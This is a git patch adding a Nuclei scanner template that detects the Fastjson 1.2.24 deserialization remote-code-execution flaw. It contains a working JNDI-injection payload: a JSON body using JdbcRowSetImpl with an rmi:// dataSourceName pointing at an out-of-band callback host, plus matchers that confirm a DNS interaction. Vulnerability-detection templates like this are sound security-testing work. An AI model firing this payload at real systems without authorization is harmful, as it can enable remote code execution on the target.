From 16ea26b2959de3c1103c2e6ae2073919605e663e Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Mon, 11 Oct 2021 01:16:37 +0530
Subject: [PATCH] Added Fastjson 1.2.24 Deserialization RCE

---
 .../fastjson/fastjson-1224-rce.yaml           | 39 +++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 vulnerabilities/fastjson/fastjson-1224-rce.yaml

diff --git a/vulnerabilities/fastjson/fastjson-1224-rce.yaml b/vulnerabilities/fastjson/fastjson-1224-rce.yaml
new file mode 100644
index 0000000000..5740b7204c
--- /dev/null
+++ b/vulnerabilities/fastjson/fastjson-1224-rce.yaml
@@ -0,0 +1,39 @@
+id: fastjson-1224-rce
+
+info:
+  name: Fastjson 1.2.24 Deserialization RCE
+  author: zh
+  severity: critical
+  reference:
+    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
+    - https://www.freebuf.com/vuls/208339.html
+    - http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/
+  tags: fastjson,rce,deserialization
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+            "b":{
+                "@type":"com.sun.rowset.JdbcRowSetImpl",
+                "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
+                "autoCommit":true
+            }
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms DNS Interaction
+        words:
+          - "dns"
+
+      - type: word
+        condition: and
+        words:
+          - "Internal Server Error"
+          - "500"
\ No newline at end of file